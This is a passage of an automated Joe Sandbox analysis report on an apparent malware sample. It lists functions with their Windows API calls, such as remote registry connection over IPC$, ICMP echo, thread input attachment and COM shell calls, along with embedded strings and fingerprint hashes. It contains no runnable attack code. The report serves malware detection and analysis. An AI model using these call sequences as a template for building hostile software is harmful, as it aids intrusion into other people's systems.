                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                              • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00DBF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00DD9742
                                              • LoadStringW.USER32(00000000,?,00DBF7F8,00000001), ref: 00DD9745
                                              • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00DD9866
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: HandleLoadModuleString$Message_wcslen
                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                              • API String ID: 747408836-2268648507
                                              • Opcode ID: 389bbe9164a2e8ed56ecb97d286ce28a0741c9c43e31c0ac9d1e321c1d73ba3d
                                              • Instruction ID: 654f9a9f119a55440382e4e2c7108a816536af0753da9b2b21d5e15309e9a71e
                                              • Opcode Fuzzy Hash: 389bbe9164a2e8ed56ecb97d286ce28a0741c9c43e31c0ac9d1e321c1d73ba3d
                                              • Instruction Fuzzy Hash: EC413A72800219AACB14EBE0CD96DEEB778EF55740F608126F60972192FA356F48CB71
                                              Function 00DD06DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D76B57: _wcslen.LIBCMT ref: 00D76B6A
                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00DD07A2
                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00DD07BE
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00DD07DA
                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00DD0804
                                              • CLSIDFromString.COMBASE(?,000001FE), ref: 00DD082C
                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00DD0837
                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00DD083C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                              • API String ID: 323675364-22481851
                                              • Opcode ID: b958ede0bdd736cac735e00e9f94f915a05b3e6e7f0657b2a6d5ed9f64f1e674
                                              • Instruction ID: e2a5e9a37324e29a08cb8f857a07b376eb6028e78e8b5b67a57dc850e5fea53b
                                              • Opcode Fuzzy Hash: b958ede0bdd736cac735e00e9f94f915a05b3e6e7f0657b2a6d5ed9f64f1e674
                                              • Instruction Fuzzy Hash: 67411772810228ABCF11EBA4DC95DEDB778FF54340F54812AE915B32A1EB309E44CBB0
                                              Function 00DE7A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 00DE7AF3
                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00DE7B8F
                                              • SHGetDesktopFolder.SHELL32(?), ref: 00DE7BA3
                                              • CoCreateInstance.COMBASE(00E0FD08,00000000,00000001,00E36E6C,?), ref: 00DE7BEF
                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00DE7C74
                                              • CoTaskMemFree.COMBASE(?), ref: 00DE7CCC
                                              • SHBrowseForFolderW.SHELL32(?), ref: 00DE7D57
                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00DE7D7A
                                              • CoTaskMemFree.COMBASE(00000000), ref: 00DE7D81
                                              • CoTaskMemFree.COMBASE(00000000), ref: 00DE7DD6
                                              • CoUninitialize.COMBASE ref: 00DE7DDC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                              • String ID:
                                              • API String ID: 2762341140-0
                                              • Opcode ID: dcb7cbfec0f79b4211f507b93a7be59035ac02da7576fafb458c4f3ec50e9d98
                                              • Instruction ID: 37a6d3354cd8e9624d8db091e2a1a9eb345590a534570f37f0d6c5660cb3495e
                                              • Opcode Fuzzy Hash: dcb7cbfec0f79b4211f507b93a7be59035ac02da7576fafb458c4f3ec50e9d98
                                              • Instruction Fuzzy Hash: 04C14C75A04149EFCB14DFA5C884DAEBBF9FF48304B148598E419EB261D731ED85CBA0
                                              Function 00E0541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00E05504
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E05515
                                              • CharNextW.USER32(00000158), ref: 00E05544
                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00E05585
                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00E0559B
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E055AC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessageSend$CharNext
                                              • String ID:
                                              • API String ID: 1350042424-0
                                              • Opcode ID: 4b783f3cfd2191cb5344a9ab1d83a3830f7905ddcfbe0f9fab0c0b75fc9d0356
                                              • Instruction ID: d7e9daec505d4f992795cef67ce7e05f552a532bebf34dd1f4b0e727c1e7f63e
                                              • Opcode Fuzzy Hash: 4b783f3cfd2191cb5344a9ab1d83a3830f7905ddcfbe0f9fab0c0b75fc9d0356
                                              • Instruction Fuzzy Hash: 3F617836900608AEDF208F95DC84AFF3BB9EB0A724F105145F925BA2D0D7719AC5DF61
                                              Function 00DCFA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00DCFAAF
                                              • SafeArrayAllocData.OLEAUT32(?), ref: 00DCFB08
                                              • VariantInit.OLEAUT32(?), ref: 00DCFB1A
                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00DCFB3A
                                              • VariantCopy.OLEAUT32(?,?), ref: 00DCFB8D
                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00DCFBA1
                                              • VariantClear.OLEAUT32(?), ref: 00DCFBB6
                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 00DCFBC3
                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00DCFBCC
                                              • VariantClear.OLEAUT32(?), ref: 00DCFBDE
                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00DCFBE9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                              • String ID:
                                              • API String ID: 2706829360-0
                                              • Opcode ID: 927cfcfa8f814035bcdf29ee03c49ab20be38245a91ea71ba0175b6ada2b589e
                                              • Instruction ID: eb73fc0aeeae87ac36e039d09311b1be96007432d98b24dc2b360a50e8577dfc
                                              • Opcode Fuzzy Hash: 927cfcfa8f814035bcdf29ee03c49ab20be38245a91ea71ba0175b6ada2b589e
                                              • Instruction Fuzzy Hash: BE413D35A0021A9FCB00DF65C854EEEBBBAFF48344F108169F955A7261DB31AD85CBB0
                                              Function 00DF055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WSAStartup.WS2_32(00000101,?), ref: 00DF05BC
                                              • inet_addr.WS2_32(?), ref: 00DF061C
                                              • gethostbyname.WS2_32(?), ref: 00DF0628
                                              • IcmpCreateFile.IPHLPAPI ref: 00DF0636
                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00DF06C6
                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00DF06E5
                                              • IcmpCloseHandle.IPHLPAPI(?), ref: 00DF07B9
                                              • WSACleanup.WS2_32 ref: 00DF07BF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                              • String ID: Ping
                                              • API String ID: 1028309954-2246546115
                                              • Opcode ID: a7173b38521def04aa9714e4d87f8795e107f81bd4b9ef73ba338b045a13c196
                                              • Instruction ID: 7f75109b45b81f51d60c98e6e2b7cb4734c779a24647e7c52f30831a4364e969
                                              • Opcode Fuzzy Hash: a7173b38521def04aa9714e4d87f8795e107f81bd4b9ef73ba338b045a13c196
                                              • Instruction Fuzzy Hash: E9918D756042019FD720DF25C488F2ABBE0EF44318F19C5A9F5699B6A2C770ED85CFA1
                                              Function 00DF8CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _wcslen$BuffCharLower
                                              • String ID: cdecl$none$stdcall$winapi
                                              • API String ID: 707087890-567219261
                                              • Opcode ID: 747906c6941dcb7423ed4be1453a10a7cb94c7d5c5938fd69fd90145b32ec869
                                              • Instruction ID: 7d08e136cb1d6ec27dc5edfcb25197c25265197efba48df94720e9bd51d447d8
                                              • Opcode Fuzzy Hash: 747906c6941dcb7423ed4be1453a10a7cb94c7d5c5938fd69fd90145b32ec869
                                              • Instruction Fuzzy Hash: CE51B472A0011AABCF14DF68C8518BEB7A1FF64324B268229F655E7280EB31DD40D7B1
                                              Function 00DF372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CoInitialize.OLE32 ref: 00DF3774
                                              • CoUninitialize.COMBASE ref: 00DF377F
                                              • CoCreateInstance.COMBASE(?,00000000,00000017,00E0FB78,?), ref: 00DF37D9
                                              • IIDFromString.COMBASE(?,?), ref: 00DF384C
                                              • VariantInit.OLEAUT32(?), ref: 00DF38E4
                                              • VariantClear.OLEAUT32(?), ref: 00DF3936
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                              • API String ID: 636576611-1287834457
                                              • Opcode ID: 5234094fde788cc8aa54d8d83c68db7e0b9560e924e25c6ec87a5b5e5e3ce91d
                                              • Instruction ID: f3c91ddd8a8049c925a013b743901b0fbafdfc31abb81e1bf72a7ec0ba4f61cd
                                              • Opcode Fuzzy Hash: 5234094fde788cc8aa54d8d83c68db7e0b9560e924e25c6ec87a5b5e5e3ce91d
                                              • Instruction Fuzzy Hash: 1861C5B0608305AFD310EF54C849F6ABBE4EF44750F168909FA8597291D774EE88CBB2
                                              Function 00DE3388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00DE33CF
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                              • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00DE33F0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: LoadString$_wcslen
                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                              • API String ID: 4099089115-3080491070
                                              • Opcode ID: d71ae0df0c631a8bf414db765354d66e8b7439f0dcc7f7d35a1654e21021732b
                                              • Instruction ID: 666acd3d1b80937559d638a06d2cb1dc9e6c0aa4d6f811baab413b1312e1c70f
                                              • Opcode Fuzzy Hash: d71ae0df0c631a8bf414db765354d66e8b7439f0dcc7f7d35a1654e21021732b
                                              • Instruction Fuzzy Hash: 4851AE72800209AADF15EBA0CD56EEEB778EF14340F248166F50973192EB316F98DB71
                                              Function 00DDB5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _wcslen$BuffCharUpper
                                              • String ID: APPEND$EXISTS$KEYS$REMOVE
                                              • API String ID: 1256254125-769500911
                                              • Opcode ID: 0a354ce893baf54adda1478e14b6a12a385bbae740e60323858f2afd8abe4dfc
                                              • Instruction ID: 245dfee233a681554478035ee5d01d8042b82eff7133d27e175b6c8c77426888
                                              • Opcode Fuzzy Hash: 0a354ce893baf54adda1478e14b6a12a385bbae740e60323858f2afd8abe4dfc
                                              • Instruction Fuzzy Hash: 1A41B632A00126DBCB105F7D88915BE7BA5EBA577CB2A412BE465DB384E731CD81C7B0
                                              Function 00DE5393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 00DE53A0
                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00DE5416
                                              • GetLastError.KERNEL32 ref: 00DE5420
                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 00DE54A7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Error$Mode$DiskFreeLastSpace
                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                              • API String ID: 4194297153-14809454
                                              • Opcode ID: 4cae14e8d58cfc6fc9f54f8931e43706203f7485fc35056c6f6e00287baf379e
                                              • Instruction ID: 5d11c83bb3164260b5f4b339acc8706550d012c6e433e806b994dc263adce251
                                              • Opcode Fuzzy Hash: 4cae14e8d58cfc6fc9f54f8931e43706203f7485fc35056c6f6e00287baf379e
                                              • Instruction Fuzzy Hash: A3311435A001449FCB00EF6AD489AAABBF4EF44349F58C065E406DB2D6E771DD86CBB0
                                              Function 00E03A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00E03A9D
                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00E03AA0
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E03AC7
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E03AEA
                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00E03B62
                                              • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00E03BAC
                                              • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00E03BC7
                                              • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00E03BE2
                                              • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00E03BF6
                                              • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00E03C13
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessageSend$LongWindow
                                              • String ID:
                                              • API String ID: 312131281-0
                                              • Opcode ID: 53cc026f29bf43d1fd666a7482ac613ad0dfd930c092cab1b3dc807a511bd1da
                                              • Instruction ID: 8f33d1d4d6af4549b08b9ff048e8e84723a86db268e72659030122452b3e5fc2
                                              • Opcode Fuzzy Hash: 53cc026f29bf43d1fd666a7482ac613ad0dfd930c092cab1b3dc807a511bd1da
                                              • Instruction Fuzzy Hash: B7614775900248AFDB10DFA8CC81EEEB7B8EB49704F104199FA15B72E1D770AE85DB60
                                              Function 00DDB12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 00DDB151
                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00DDA1E1,?,00000001), ref: 00DDB165
                                              • GetWindowThreadProcessId.USER32(00000000), ref: 00DDB16C
                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00DDA1E1,?,00000001), ref: 00DDB17B
                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00DDB18D
                                              • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00DDA1E1,?,00000001), ref: 00DDB1A6
                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00DDA1E1,?,00000001), ref: 00DDB1B8
                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00DDA1E1,?,00000001), ref: 00DDB1FD
                                              • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00DDA1E1,?,00000001), ref: 00DDB212
                                              • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00DDA1E1,?,00000001), ref: 00DDB21D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
